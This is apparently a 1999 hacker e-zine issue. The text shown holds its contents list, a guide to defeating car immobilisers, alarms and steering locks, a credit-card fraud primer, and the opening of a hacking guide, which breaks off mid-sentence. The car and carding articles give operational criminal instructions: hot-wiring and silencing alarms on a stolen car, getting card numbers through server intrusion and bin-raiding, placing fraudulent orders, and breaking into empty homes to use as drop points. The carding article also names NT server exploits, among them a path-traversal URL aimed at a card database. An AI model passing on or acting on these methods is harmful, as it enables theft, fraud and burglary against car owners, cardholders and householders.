Copy Link
Add to Bookmark
Report
Underground Periodical Issue 04
___________ _______________________________________
", / / ___ _.-'' '.
/ / / / /NDERGROUND> .' _ |
/ / / / / _______ / / \ /
/ / / / / / ___ \ / __/_.' /
/ / / / / / /__/ / /.-'' .'
/ / / / / / _____.' /_________..-'
/ / / / /___/ /_ / /
/ / / '.____ __/ / /
| / / / / / /
\ | _.' /__/ERIODICAL> / /
'-._'..-'_______________________________/__..-'
"We're on the Up and Up"
:..:..::..Issue..::..:..:
Issue 4 June 1999
:.::.::.:.Staff.:.::.::.:
Cyborg - Editor
HitMan - Writer
Darkflame - Writer
CrossFire - Writer
:.::...Greetings To..::.:
fORCE
GPF#2
Zomba
ZirQaz
Rekcah
HellBent
Crypt0genic
Firestarter
:..::..:.Website.:..::..:
http://www.ecad.org/up/
:..::..:..E-mail.:..::..:
under_p@yahoo.com
:..::.:.Subscribe.:.::..:
upzine-subscribe@egroups.com
:.:.Alternative Hosts.:.:
http://www.ecad.org
http://www.swateam.org
http://www.tdshackers.com
http://www.pinnacle-creations.com
:..::..Introduction.::..:
<*> You are reading the fourth issue of Underground Periodical (like
you didn't already know that duh!). We're back again as usual bringing
you our latest in opinions and technical information. Now, anybody who
has visited our website might have noticed one thing... it's not very
good! There is a new opening for a place joining the staff, Webmaster.
We are inviting people to apply for a position redesigning our website
in whatever way they see fit. Send a sample of your work and graphics
or give us a URL to view your work to: under_p@yahoo.com. The best page
designer will be given full creative control to conjour up some HTML
that proves worthy of our high standard. Remember that you will have to
design the graphics as well.
<*> Well, as you might have noticed the changeover to ecad.org is
finally complete. It is an excellent website based on computer
security maintained by crypt0genic and rekcah who have been very
generous with their web space and deserve some sort of trophy for all
their efforts. If you'd like to host Underground Periodical on your
website like the four alternative hosts above get in contact with us
immediately. In return we will do all we can to help increase the
traffic of your site.
<*> We'd like to thank any and all people who submitted to Issue 4 or
contributed in any way. Would you like to join them in flexing your
writing talent and receiving our undying praise? If us staff members
were to write it all on our own it would be, and lets face it, shite.
Without continued support from the underground community we won't be
able to keep on going. It's your magazine, so help it out a little.
Anyway, on with this issue...
:..::.:..Contents.:.::..:
<*> 1 - Inroduction & Contents : Cyborg
<*> 2 - Beating Car Alarms : Franco
<*> 3 - Introduction To Carding : Axcess
<*> 4 - Guide To Hacking : Mob Boss
<*> 5 - Windows Security Holes : NeonBunny
<*> 6 - Portsurfing Computers : Darkflame
<*> 7 - The Virus File : HitMan
<*> 8 - Editing The Registry : Cyborg
<*> 9 - Making Macro Virii : Tefx
<*> 10 - Elevator Beige Boxing : Holyblob
<*> 11 - Windows 98 Flaw : HitMan
<*> 12 - SMTP User Verifying : NeonBunny
<*> 13 - You've Got Mail : Readers
<*> 14 - Disclaimer & The End : Up Staff
:..::..End Of File..::..:
:..::..File 2 Of 14.::..:
:...Beating Car Alarms..:
:..::.:.By Franco.:.::..:
<*> Car alarms, imobilisers and additional locks
Can I just start by setting out the world of differnce between an
imobiliser and a car alarm. Yes, I'm explaining it, there are some out
there that don't actually know this so...
An alarm is a device or, a series of devices, that have various guards,
(siren, doors locks etc.) to deter or hinder the vehicle being driven
away. The job of an imobiliser is to stop criminals from starting the
engine and driving away. The various types are separated by the number
of circuits. These circuits can be controlled brakes in electrical
transmission to the engine and its components, starter motor, fuel pump
etc. until it is disarmed. This array of circuit breaks is controlled
by a series of electronic relays inside the imobiliser's black box,
brain, which cuts the power. The most common setup in an imobiliser is
that which comprises a transponder key fob. This is were near the
ignition, fitted is an aerial receiver, when the transponder is passed
close by it automatically sends a signal which when recognised allows
the car's engine to start. In some cases the imobilisers, the car's
engine will start but the gearbox movements will be inoperative and
so... no go!
(I) Imobilisers
(II) General information on imobilisers and alarms
(III) Alarms
(IV) Additional locks (steering locks, gear locks and pedal locks)
(I) IMOBILISERS
These are fairly new line of car protection with the first few, proper
imobilisers appearing around 1992. Nothing much has changed since
really, all that's been developed is the more amount of cuts available
and various features which can be associated to them. I'll get on to
the SMART imobilisers at the end of this section. Now, imobilisers come
in many different shapes and forms and manufacturers. For instance, if
your target car has a sticker with the words "Protected by Clifford
systems" or "CAT" then forget about it, as these are second to none and
I've never heard of a car with this security being nicked so in all
honesty you and I, yes I the master, wouldn't stand a chance!
Imobilisers consist of three main parts, the brain, the power source
(which can be independent of the car battery), the cuts and a siren of
sorts, (this is optional for some). To beat them... well if we can
because they are SERIOUSLY HARD to beat, depends on two main factors:
(a) If its been installed DIY style and there's a mass of wires and
indeed the imobiliser is visible and easy reach and the number of
cuts to the engine. If its DIY style then hopefully it will of been
installed far away from the bulkhead and with luck on your side
visible.
(b) If the stickers on the window say MOSS security or some low budget
system then you will have better odds at beating the brain transponder
and the aerial, also many of the low budgeters use only one circuit.
Getting down to it... to un-imobilise you're gonna need one or two
things:
1. your mate to keep an eye out as always.
2. wire cutters.
3. crocodile clips.
4. a bit of wire.
5. screwdrivers (assorted).
6. electrical tape.
7. 12 volt test meter.
8. some big balls and a lot of nerve.
The imobiliser that I will be trying to show how to disarm is one that
operates with a transponder key fob, though there are similarities in
systems that don't incorporate this feature. SEE IMOBILISERS/ALARMS
EXPALINED ABOVE AT THE START.
METHOD NO 1. Now first off get into the car, once in, rip away at the
underneath of the dash near the ignition. In an effort to confuse the
criminal, some manufacturers only give the owner the wires in one
colour, (black) which once the installer has removed the identification
stickers, it leaves the perspective thief to cry and walk away unless
they know, and I mean know, the system well and have bundles of time.
Scan the wires leading from the imobiliser to the cut points which
should be obvious as wires will of been spliced and cut and then
re-joined again and the more evident this is the better your chances of
success are, one sure way of finding cut points is by looking for
different wire colours merged together or spend a bit of time with the
old trusty meter. Once you've found these cut points, jam them together
with tape to recreate the original circuit. ALL OF THE BREAKS MUST BE
RESTORED BEFORE YOU CAN DIRVE AWAY. Then give the engine a try and...
if you hear that sweet adrenaline pumping sound of an engine ticking
over and running then, yes you're set to drive away, WUPEEEEEEEE! If
not... fuck that!
METHOD NO. 2. This were you locate the imobiliser circuits and attempt
to restore the correct settings by trying to get the relays to switch
over to the preffered settings. This is where it gets vague big style!
What I suggest is that you attempt to do the above by means of
electrical current from an external supply or if the relays are of
consequent size, switch them by hand. Or... you could beat the crap out
of it with a hammer though I don't think you'll find much success
there!
<*>-----------------------------------------------------------------<*>
TIP
If you want a vehicle with little hassle then don't go near a car with
an imobiliser as working on imobilisers is a time consuming business
with only a 38% chance of success (approx.). Also if the stickers on
the window read the words "CAT" or "CLIFFORD" systems then walk away as
they are second to none!
<*>-----------------------------------------------------------------<*>
(II) SMART IMOBILISERS/ALARMS
The most recent and in many cases the most expensive incorporate
various features such as auto locking doors and windows which locks
them unless a specific code or device is inputted to the brain. Others
include the rather drastic but very successful smoke imobilisers which
can release a non harmful gas to imobilise the thief or hinder his/her
view when trying to drive away. For those who want to kill any one who
touches their car, the gases can be changed so that you die instead of
being put temporally asleep and the owner will get off scott free!
Some incorporate these, though there's a 99% chance that you'll never
encounter this. Another is where the chair can be changed so that in
the case of the car being stolen and if you don't input whatever into
the brain, electrical elements within the chair will electrocute you
until you're a sizzling mound of bone and fleshy goo, NASTY no? Another
is where the car stereo can be set to blast you with whatever music to
alert and draw attention to the thief. Imagine being caught in a car
blaring out BILLIE at 90 decibels, embarrassing would not be the word.
In a similar instance the imobiliser can be set to either ring or page
the owner or police with a preprogrammed message such as "Help help.
I'm being stolen my owners address is ?? and my G.P.S. position is ??"
Yes someone can track your every move which brings me on to the
TRACKER. This is what's known as a quiet alarm as it doesn't always
notify the thief that the car is being tracked. The tracker rings or
sends out a special distress signal to the police in the area and the
cars every movement is logged and being watched as you drive and once
the system is engaged the police will of already hopped into their
Cossie response unit and will be up your arse before you know it!
(III) ALARMS
Well after that depressing reminder that imobilisers are hard you're
gonna want to hear something nice and so... alarms are easier to beat
depending on a couple of things, how many devices the alarm comprises
of and whether or not it has it's own power supply and how well hidden
it is. And so to a brief sum up of the devices incorporated in
different alarms, a motion detector, door/bonnet/boot switches, timing
circuits, steering movement, distance sensor, ride height and siren,
(all of which can be tied into the entire system). All of these devices
can be nasty if the system has its own power supply independent of the
engine. To the methods...
(I'M GONNA POINT OUT RIGHT NOW THAT THE OBVIOUS AND QUICKEST METHOD
WITH 50% TO 70% SUCCESS WILL BE EXPLAINED BUT I FEEL THAT KNOWLEDGE
SHOULD BE GAINED AND THAT YOU SHOULD EDUCATE YOURESELF RATHER THAN
KNOWING THE BARE ESSENTIALS!)
METHOD NO. 1. Based on the idea that the "ALARM RUNS OFF THE CAR
BATTERY" either lift the bonnet up if you can without setting the alarm
off, if at all possible or smash a window a pull the bonnet release
catch inside the car. With practice your speed and confidence will
increase. Once the bonnet is up then disconnect the positive or
negative terminals or both. Don't let either terminals make contact
with one another when one side is connected or you could have the
battery blow up in your face, not very helpful when trying not to draw
attention to yourself!!. Once disconnected enter the car as you like.
You have two options on trying to locate the alarm box, either are very
messy, rip away at the dash by the ignition approach or wherever the
alarm is disarmed from and follow the wires back, the other way is to
search the interior and engine bay frantically and with a bit of common
sense and experience you will recognise the set patterns and placement
of alarms and the devices and the physiology of it all which can and
does speed up your technique.
Now back to the job at hand, once you've neturalised the power source
and found the alarm the idea is to gain access to it and either short
it out (which can lead to various problems explained later), or try and
disarm it by making the appropriate circuits electrically. To do this
it's trusty meter time with a dollop of common sense and electronic
sense mixed in. Bring to a boil and after examining the alarm's
circuits, it should be obvious or at least you will have a suspicion of
what circuits need opening and closing. And so you do this, reconnect
the battery and drive away.
<*>-----------------------------------------------------------------<*>
TIP
An alarm does not stop you from driving away in the car but it does
hinder your driving in that some will cause headlights and windscreen
wipers etc. to function regularly and make you stand out. A car in a
blazing hot dry day with wipers going from side to side and lights
flickering on incessantly would attract my attention for certain!
<*>-----------------------------------------------------------------<*>
METHOD NO. 2 Based on the premise that "THE ALARM HAS IT'S OWN POWER
SUPPLY" you're gonna have to work EXTRA QUICK as undoubtedly once one
of the alarm implements is violated or activated etc. the alarms going
to go off and we can't have that for too long! Now after setting off
the alarm your first priority is to disable the siren as this brings in
the most amount of attention. Now this is where the physiology comes
into play again, many people install the sirens under the bonnet with
the idea that it will be heard a lot louder, and rightly so but this is
where the exploit lies. When the siren first sounds from you opening
the bonnet to looking for one or whatever, the siren although awkwardly
placed most of the time it's easy to disarm with wire cutters.
The owner's misconception is in as to what is good positioning of the
sound device is that they will in many cases believe the more awkward
it was for them to drill the pilot holes and wire up and install it,
the harder it is for the criminal to cut the wires or disarm it by
other means. The other fault is that many people who install them will
think of it being made inoperative with the use of a clumsy 7lb lump
hammer or crowbar which is hardly ever the case! With main alarm
feature disabled, you move onto other important devices which may be
restricting access to indicator use etc. This can be a major problem if
you need the car for something inconspicuous and low key. All that you
need to do in this case is simply rewire the indicators under the dash
or wherever the alarm intersects the light circuits to the original.
If you can't do this there and then as in most cases, just take the car
to some quiet/safe spot and work on the circuits there or you could try
your hand at the alarm circuits itself. I feel it prudent to point out
the fact that if your seen driving a car that has its lights/windscreen
wipers going on and off the police if in the area will pick this up
straight away as its a direct sign that a car's alarm may still be
partially active and they will of seen it time and time again. Also,
removing the battery from the alarm isn't always a good idea because if
the current is not flowing in some cases the circuits won't make and
some vital features won't function, but with that being said if you
were to use a null battery or complete the circuit with a low power
source you might get away with it. So, disabling an independently
powered alarm isn't all the headache as it seems.
METHOD NO. 3 (THE EASY WAY!!!!!) This is where you open up the bonnet
if the alarm runs off the car battery and you separate the alarms
source of power form the rest of the cars and hey presto, the alarm
stops and you're not noticed.
<*>-----------------------------------------------------------------<*>
TIP
When trying to lift up bonnets without going inside of the car, it can
be a good learning experience to go to scrap yards and familiarise on
the movements and characteristics of different manufacturer's catches.
Sounds sad to some people but there's nothing sad about quickening your
entry times etc. into cars as a stay in prison and a criminal record
sounds pretty sad to me!
<*>-----------------------------------------------------------------<*>
(IV) Steering wheel locks, gear locks and pedal locks
(1) STEERING WHEEL LOCKS
These are usually chosen by either the over cautious or those without
any real form of defense for the car and are just trying to deter
the opportunist. The locks come in many shapes and sizes with varying
features i.e. the colour, yellow or light yellow. The principal behind
them is that in the case of a steering lock that a bar for some strong
titanium metal etc. is positioned such that the wheel cannot be turned
more than one fifth turn approx. and effects the turning circle of the
car making it impossible to drive round a 45 degree turn and greater.
This is so when the bar which extends out from the lock is placed
either across the wheel or dash. In the case of the dash the only way
to free movement would be to cut a 360 circle around the steering
column but then again you could ask the owner to give you the keys and
kiss your ass and expect more joy, not bloody likely!
If it's a bar across the steering wheel then it's easier but not much.
Firstly in most cases the lock is put on the wrong way giving to much
leeway or turn of the steering wheel, if this is the instance, you can
cut away at the dash, it hits slash/move back or remove the seat which
it will invariably hit and the piece of door trim in its path. Now
those are the extreme cases if you have a lot of time to work on the
car and intend on pissing the owner off and its in a secluded spot.
Here comes the sensible option, you can either use the petrol cutter
approach (you need a secluded car and it makes too much noise (ENOUGH
SAID). Pick the lock or gouge away at the locking pieces of metal which
form the actual lock.
(a) Picking the lock
(b) Disrupting the meeting pieces of metal which form the lock
(c) I ALREADY SAID ENOUGH!
(a) Picking the lock in many cases can be far easier and vice versa
than performing approach (b). First off, if it is a new lock on the bar
or steering wheel i.e. its one of those you see on a bicycle lock
cryptinite, different to normal pin tumble style locks then either turn
to the next step or walk away. I'm not kidding, those types of locks
are almost impossible to pick! If on the other hand it locks like a
normal lock, pin tumble them... you have a chance. Pick this the way
you would any other lock of its style and with a bit of luck it should
open.
(b) To do this you will need a couple of tools, a couple of jimmies
(crowbars), a strong screwdriver and in many cases a mate to hold and
help. Got all these, great! Firstly examine the lock and attempt to
determine whereabouts underneath the metal covering the two opposing
locking metal prods are, if the cover is plastic then rip it off. The
idea is that as you bend the metal covering of the steering wheel lock
(in many cases part of the lock mechanism) such that the other piece of
the lock becomes momentarily detached and has nothing opposing it's
movement and that you can twist the lock apart. READ THIS AGAIN AND
YOU'LL GET IT! I just want to sat right here that it is POSSIBLE for
this to happen because I know someone who had it happen to him and the
lock was only three years old and pretty impregnable, and they weren't
exactly car thieves supreme. YES THEY WERE CAUGHT AND DEALT WITH BUT
THAT'S ANOTHER STORY.
(2) PEDAL LOCKS
In this case depending on the age and manufacturer of the lock then it
will be either cryptinite style or other. The same ideas apply as from
part (b) and in some severe cases part (c). Another solution is to
loosen the screws/bolts that hold the pedal concerned in place and slip
it out of its locked state and replace. This though depends if the
other end of the lock is still attached to the steering wheel which
means you've still got a problem! The loosening of the pedal may also
cause problems with tension that is needed for the appropriate pulling
force on the actual accelerator under the bonnet to function and in
many cases if not all, you will find it next to impossible (without the
appropriate tensioning tools) to replace as the line will have been
secured and taught with both attached etc.
(3) GEAR LOCKS
These style of locks are rapidly going out of use and there aren't all
that many variants either. Again the same conditions etc. apply for (b)
and (c) in severe instances. Though there is one exploit of the common
gear lock, in many cars, such as Vauxhalls e.g. the Vauxhall Astra mk
III the covering comes detached quite easily and if you can manage to
remove and cut away at this then you may be able to slip and slide the
hook off and result in free gear movemnets. There is one final exploit
though, if you're working on a crappy budget car e.g. a Yugo (SHAME ON
YOU. I HOPE THAT YOUR WORKING ON THE CAR TO BRING IT TO A SCARYARD
OR CRUSHERS OR HOPING TO DRIVE IT OFF A CLIFF!) Anyway, the other
avenue of choice is to try and locate the screws and/or bolts that hold
the handbrake in place.
If these are covered up by part of the lock and the metal looks too
hard to bend then don't proceed. If though, you can see the screws or
bolts then unfasten them so the handbrake unit becomes loose, now
depending on the tension it remains questionable if you'll be able to
cut the steel wire which will in turn leave the unit free to move and
with fingers crossed will allow the gear stick to be moved side ways
and back and fourth with the lock still attached. The "BIG" drawback is
that you'll have no handbrake whatsoever!
<*>-----------------------------------------------------------------<*>
THE END
That's all folks... for now. If you have any questions, corrections etc
or just want to talk, you can e-mail me at crops@indigo.ie. BUB BYE...
<*>-----------------------------------------------------------------<*>
:..::..End Of File..::..:
:..::..File 3 Of 14.::..:
:Introduction To Carding:
:..::.:.By Axcess.:.::..:
<*> NOTES
It's spelt axcess with a lowercase `a'; POSIX naming conventions,
thank you. RipperTM is dead, axs lives on. Thanks for your time.
<*> PREAMBLE
This file deals with the fundamentals of Credit Card Fraud. We will
try to cover all subjects here, but remember this is only a primer.
Credit Card Fraud is one subject where real knowledge only comes from
hands on experience.
It is also the debut for my WFF File ID utility, which is part of the
WFF file format suite. E-mail me for more info, or request my
projects file. The line below stamps the file with an expiry, a
categorisation, author, and contact address. WFF File ID is free, so
get a copy off me now!
{#1byt.dbsejoh/uyuÿ9:79ÿ7hzÿ2czuBhtggwm0eqoÿ9Rjwwr}*)Jw)Rw}{xm~l}rxw)}x)Lj{mrwpÿ8\}|wzqit{ÿ13715::ÿ3qrqh#}
The official song for this article is Bedrock's Set In Stone from the
Euphoria two CD set. Yeah, I always do that :).
<*> INTRODUCTION
First off, a few basic rules that should always be followed:
a) Never card for profit. This is a big no-no, as in most
countries, if you get caught, the penalty is far worse than
doing it for personal use (sounds like drugs, doesn't it?) :)
b) Never go over the cash limit on the card, and if you aren't sure
of the cash limit, don't go over £400. This is just a precaution
but if you want to risk it, you can go up to £1000.
c) Never use a delivery address for longer than two weeks. Using it
for any longer than above said is just too big a risk. I have
had personal experience of this one, and it's not funny.
d) Never tell your mates, el33t hax0r dud3z, your mum, cat, dog,
girlfriend, or otherwise about what you are doing. This is a
classic trust no-one case. If your mum asks you where you got
that lovely flat screen, make up some bullshit, but never the
truth. It is advisable to stick to internal goods if buying
stuff for computers.
Ok, I think we're just about ready to go on, don't you? :)
<*> STEP 1: SEEK
The process of getting the actual card numbers is almost always the
most difficult part. Methods I have used successfully have included:
o CompuServe (for countries with computerised signup) E-mails
(bullshite).
o Insecurities on Internet Billing Servers (recommended).
o Picking information out of company accounts (very easy, but
requires the company to bring you in to do work for them first).
o Microsoft Windows NT/Transaction Server vulnerabilities
(unlikely).
o Trashing.
(recommended).
Another method I have never been desperate enough to try is burglary,
it sucks because you aren't guaranteed a reward and also the risks
involved are just too high.
We will discuss all of these later. First you need to know the basic
information you are trying to acquire:
o Credit Card number.
o Expiry date.
o Postal address for holder.
o Postal code.
o Telephone number.
The following information would be completely valid for transaction
if it were real, i.e. All the information ever asked for is here:
Number : 4921 1337 1337 1337
Start Date : Jan 1998
Expiry : Dec 2005
First : John
Last : Dickson
Telephone : (01222) 648223
Address 1 : 16 Longridge Court
Address 2 : Stockingstown
Address 3 : Cardiff
Postal : CA11 2DF
Now you know what to look for, lets get explaining the techniques in
acquiring the information in the first place.
CompuServe E-mails
A bit of a shitty technique which I used only once. This requires
you to be in a country that allows computerised account signup
(currently all I think).
Basically, sign up using fake details, although keep your name to
something that sounds 'CompuServey', like "CompuServe Staff" or
"Accounts Department".
CompuServe's Credit Card validation system is not real-time, as of
the size of the CompuServe network, so you can use fake Credit Card
details that pass the standard simple validation algorithms. My
favourite program for producing these numbers has to be Beazly's
Number Generator which I can give you on request, although it is
available from nearly every warez kiddie's web site in the world.
After signing up, the idea is simple, compose an e-mail message
that sounds very formal, then post it off to random addresses on
the CompuServe network. Pretty basic eh? Pretty bollocks eh?
Insecurities on Internet Billing Servers
A difficult one, but the results are always 100% accurate and
detection rates are near nil if you do it right.
I won't go into much detail on this one here, as Cyborg said 4K and
there are already hundreds of files on the subject. The basic
technique is to find small online stores (and even sometimes big
ones), then locating their billing server by submitting a dummy
transaction and watching the addresses your web browser redirects
between.
Then, using a WinGate port scanner (one available from me), work
out if the machine is an NT machine or not. If it is, see the
section on Microsoft Windows NT. You can tell, because UNIXes
don't usually have the NetBIOS ports (137-139) open and because
if the machine is running a web service, it will report back
"Microsoft IIS" or something like that if you Telnet to port 80.
Using exploits, such as those found at RootShell or Fyodor's
exploit world, gain access to the machine and retrieve the billing
database. I told you I was going to be vague!
Picking Information Out of Company Accounts.
This must be the easiest of them all, as all that is required is
Administrator access (if NT based) to the accounts machine, and
while the employees aren't looking, just pull up Credit Card
details for customers or the company (try under Sales and Purchase
Ledgers).
Microsoft Windows NT / Transaction Server Vulnerabilities.
An NT based system that comes as part of Microsoft Back Office.
There are two things you can do in this case, either:
a) use the example administration forms that could possibly have
been foolishly left on the server, or
b) use one of the many NT server exploits available, such as one
of the following popular ones:
o The Red Button Exploit (ntsecurity.net)
o The Active Server Pages hole (j.llibre@codetel.net.do)
o The IIS Slash Problems (e.g.: domain.com/..\..\acc\cc.mdb)
o Incorrectly Configured Index Servers (Rhino9's MHD).
Theft or Burglary.
Pure and simple theft, pick-pocketing or otherwise. Risks are high,
chances of not getting what you want are high too, avoid it like
the plague.
Trashing
This is not for the faint hearted (believe me)! Try to avoid homes
if trashing, instead, find businesses, where there is more paper in
the bins and less nappies, tampons, rotting fruit, and dog shit.
<*> STEP 2: ORDERING
The easiest method of ordering is with a company that has a fully
computerised accounts/dispatch system, as no operators are involved.
I know I was asked to write this for the global community, but I
haven't got a clue about most other places, so I used British
examples. Good examples of fully automated dispatch systems are:
o Maplin
CashTel Modem Dialup - you need an account first though, which
simply requires you to place an order via telephone first. Hard.
o Next
http://www.next.co.uk/
I believe the following have full automation too, although I'm not
too sure:
o The Software Warehouse
http://www.software-warehouse.co.uk/
o Sun Microsystems
http://www.sun.com/. Rush out and get your copy of Solaris now
while the offer is still on!
o Microsoft
You really need their URL? Probably - their actual Europe site is
http://eu.microsoft.com/
o The Amazon
http://www.amazon.com/
I wouldn't advise you try and order over the phone, it's just too
suss. Another thing to note, some Internet sites and companies will
call the owner of the Credit Card to confirm a redirection address.
<*> STEP 3: SAFE-HOUSE
Possibly the most important aspect of the job, the Safe House, must
be perfect. If anything goes wrong with the Safe House, the whole
operation is bust. Literally.
Finding a Safe House is relatively hard, what you are looking for is
one that is quite prominent, but at the same time quite isolated,
empty, and will be empty for at least 20 days. Use any methods
necessary (Trashing, bugging PCPs, etc.) to find out when the
occupants will be vacating the house and when they will be back. Also
try to find out where keys are stored, alarm codes, if people will be
calling to check on it, etc.
Try to build up a datasheet like the following (this is the one I
use):
Address :
:
:
Post Code :
Telephone : ( ) Fax :
Alarm Code:
Key Stored:
Start Date: / /
End Date : / /
Notes :
:
:
There's nothing wrong with assessing more than one house for a job,
For a particular job I did a while ago, I had 3 extra houses at my
disposal!
<*> STEP 4: THE DELIVERY & PICK UP
Having the goods delivered is a little step that must be done
correctly otherwise you won't have a bollock were your goods are in
transit. That makes you nervous. Good carriers to use are the ones
that have check-up services that allow you find out where your goods
are. Research these, then make sure you specify you want to use your
own carrier when ordering.
The ones I tend to use are ones with hubs as close to the Safe House
as possible, I don't know why, but I always feel that it pays to be
of the same locality as the driver. For instance, saying "All 'wight,
mate?" to an English driver when you're from Northern Ireland always
makes them give me dodgy looks, but then, that's probably just me :).
Ok now, you've got the date of arrival for your goods, and it's time
to make some preparation for the arrival. If you have information on
the keys to the house and the alarm codes, use it to gain entry. Make
yourself at home, pull the curtains back, switch off the timers, and
if your in the mood, give the lawn a bit of a trim (joke!).
Tidy the outside of the house a bit. Make sure there isn't anything
obvious like notes left to the Milkman or Postman, etc. Remember,
only 1 in 1000 jobs that the delivery man delivers will be
fraudulent. He doesn't suspect a thing, so you shouldn't act
suspicious either. Plus, he probably doesn't give a fuck if it is
fraudulent or not.
If you don't have any access information for the house, use some old
fashioned brute force and ignorance; that's right, use your foot!
Now, sit back, wait for the delivery man to come, sign for it, and
run for it!
Werd-up to Xio & Backa for excelling tekneiq, Project Venona for
having me, Cyborg for making me write this, Madboar for STILL oweing
me that beer (you know why)!, evilpinky for being a female, PC Plus
for RHL 5.1, the US government for ARPANet, ARPANet for the Internet,
the ISOC for the IETF, the IETF for HTTP, HTTP for all the cool stuff
it's transferred to me, cool stuff for... you get the idea...
°
Û
ÛÛ° °ÛÛÛÛÛÛÛÛÛ
ÛÛÛ ÛÛÛÛ° ßÛÛÛÛ
ÜÜÜÜ ÜÛÜ ÛÛÛÛ° ÛÛÛÛ ßÛÛÛÛ
ÜÛÛÛÛÛÛÜ °ÛÛÛÛ° ÛÛÛÛ ÛÛÛÛ° °ÛÛ°
²ÛÛÛÛ ÛÛÛÛ° ßÛÛÛÛ° ÛÛÛÛ ÛÛÛÛ °
ú ú ú ú ú úÛÛÛÛ°ú °ÛÛÛÛ ú ú ú ú úßÛÛÛÛ ÛÛÛ² ú ú ú ú ÛÛÛÛ° ú ú ú ú ú ú
ú ú ú ú ú ú²ÛÛÛ°ú ú °ÛÛÛÜ ú ú ú ú ú úÛÛÛÛ ú ú ú ú ú ú ÛÛÛÛÛ° ú ú ú ú ú
ú ú ú ú ú ÛÛÛÜÜÜÜÜÜÜÛÛÛÛ° ú ú ú ú úÛÛÛÛÛÛ° ú ú ú ú ú ú ÛÛÛÛÛ° ú ú ú ú ú
ú ú ú ú ú²ÛÛÛ° ú ú ú úÛÛÛÛ² ú ú ú ÛÛÛ² ÛÛÛÛ ú ú ú ú ú ú °ÛÛÛÛ ú ú ú ú
ú ú ú ú ÛÛÛ° ú ú ú ú úÛÛÛ ú ú ú ÛÛÛ° ÛÛÛÛ²ú ú ú ú ú ú ÛÛÛÛ ú ú ú ú
ÛÛÛ °ÛÛÛ ÛÛÛ ßÛß °ÛÛÛÛß
ÛÛ² °ÛÛÛ² °ÛÛÛÛ °²ÛÛÛÛß
Û° ²ÛÛÛ² ²ÛÛ² °²ÛÛÛÜ °ÛÛÛÛ°
ßÛÛß ²ÛÛ ßÛÛÛ° ÛÛÛÛÛ°
ßÛ ÛÛÛÛÛÛ° [axcess]
°
axs@freeuk.com
"axcess has left the building"
http://www.axs12.free-online.co.uk
:..::..End Of File..::..:
:..::..File 4 Of 14.::..:
:.:..Guide To Hacking.:.:
:..::..By Mob Boss..::..:
***********************************************************************
THE MOB BOSS' GUIDE TO HACKING
The Mob Boss
***********************************************************************
I. Introduction
Brief History of Hacking
There is no set date in which you can say hacking was born. You
may mark it with the first computer system being developed or with
the birth of the UNIX operating system by AT&T. One thing can be sure,
hacking has been around for a long time. Maybe not in the conventional
way you may think of it, but its been around alright. I would like to
start with the early 80's though. This is after the birth of UNIX, a
time when people were running systems we may make fun of today.
Although the hardware was primative this was what I consider the prime
days of hacking. Long before AOL and even the world wide web was made
for the use of the general idiots, woops I mean public. In these days
information was spread through systems called BBSs, or Bulletin Board
Systems. These systems offered chat, bulletin boards, and files. In
these days you had more experienced hackers and phreakers (a phreaker
is a phone hacker). People shared their knowledge of various computers
they found, loop numbers, phone systems, and other such interesting
things.
If you really want to get a nostalgic point of few on I suggest
you read the Anarchist Cookbook. It holds info still which would help
you today but most of the texts, the orginal ones date back to the
eighties and were actually distributed on BBSs. Back in these days
there were only two ways to access systems remotely. One is through
telenet, a network of computers from around the world with dialups in
most major cities. The other way is a personal favorite of mine,
wardialing. This is the process of dialing every phone number in a
exchange (the first three digits of your seven digit phone number)
looking for computer carriers. There are many things found while
wardialing besides computers as well. Loop numbers (very rare these
days), PBX's, test numbers, fax machines, and other interesting numbers
all can be found by simply picking up your phone or having your
wardialer do it for you. My personal favorite for wardialers is the DOS
based TONELOC available throughout the web. Now wardialing is just
plain fun for me these days but back in yesteryear that was the only
way to hack. The interesting computer numbers were also traded among
the people on the BBSs. Although I wasn't there for the grand old days
of hacking I have first hand accounts from friends who were, and from
texts I have read. One article that really shows how much fun those
days were was a series of artilces called, Diary of a Hacker. These
things were not as uncommon as you would think, I personally know
someone who I met off the net who was a sysop on a BBS in those days.
If you are new though keep in mind hacking has changed a lot since
those days.
What is Hacking?
This question is one that I have thought about and have been
asked about many times. My definition of a hacker is someone who is
very knowledgable of various computer systems and how to work them in
ways your every day user is ignorant of. A hacker is someone who pushes
a system beyond its limits. This is a person who knows whats what and
is ethical in his work as well. If you are new and haven't read an
article on ethics then I suggest you do so. My article on ethics is
available on my website at ( http://mobboss.dragx.cx ). Finally, a
hacker is someone who uses the computer knowledge he has to gain even
more knowledge.
What hacking isn't
This is where we seperate the smart hackers of the future from the
faggots. I know Hollywood and the media may have given you some ideas
about hacking that you may have liked. For the most part everything in
the movies and on television is complete bullshit. Forget everything
you saw in Hackers, Goldeneye, and Mission Impossible. These are all
bullshit exagerations although the evil hacker, Boris in Goldeneye was
pretty cool. Hacking isn't about stealing yourself shit, its not about
taking revenge, and it is most certainly not about looking cool. God
only knows you look like shit after spending a weekend behind the old
terminal trying to access a certain server. Also no matter what your
queer freinds at school have said, using a trojan horse to access a
windows system is just plain pointless. If you do it, don't brag about
it and don't spend too much time with it since is nothing but a waste
of valuable time. If you are still interested then continue reading.
Hacking as of April, 1999
Just to clue you new guys into whats going on in the hacking community
these days. Most of your hacking and phreaking info is all on the web.
There are still a few BBSs left, some even with telnet access on the
web to save on that long distance bill. Usenet has become a wasteland
of flaming for the most part, although you still find some knowledgable
people among the ridiculous posts that come around. Web based chat such
as AOL, Yahoo, and anything else like it has no knowledgable hackers,
take my word for it. You will find nothing but big talking idiots
there. Most systems aren't as weak as they used to be. So forget
logging into remote computers without a password or as root:root like
you may have read in a old article. Even techniques from the early
ninetys are no good these days, one being the PHF exploit. Also is
impossible to find a unshadowed password file these days so forget
about it. Hacking is as hard as it ever was so don't get any false
ideas of glory.
II. First Steps
The Library
Believe it or not the library is most likely the best place to
start your hacking career. Although they may appear useless these can
be one of your best freinds. Your local library carries a wealth of
information for the inspiring hacker or phreaker. First off among the
many shitty books, there are many computer books on subjects ranging
from various Operating Systems to telecommunications info. I suggest
you take out some books on DOS, UNIX, and Windows 95/98/NT. Also I
suggest you learn about TCP/IP and networking. Read as much as you can.
Also at the library you will find many interesting directories such as
the Haines Criss Cross Directory which lists phone numbers by addresses
and numbers by names and all those vica verca. You may also decide to
use the computers at the library for either anonymity while hacking or
just for the pure pleasure of messing around with a LAN.
Search Engines
Now some of you brighter ones already know this but for the
mentally less fortunate I will go over the wonderful powers of the
almighty search engine. After looking in the library for books on
hacking you most likely turned up nothing, thats why I didn't say to
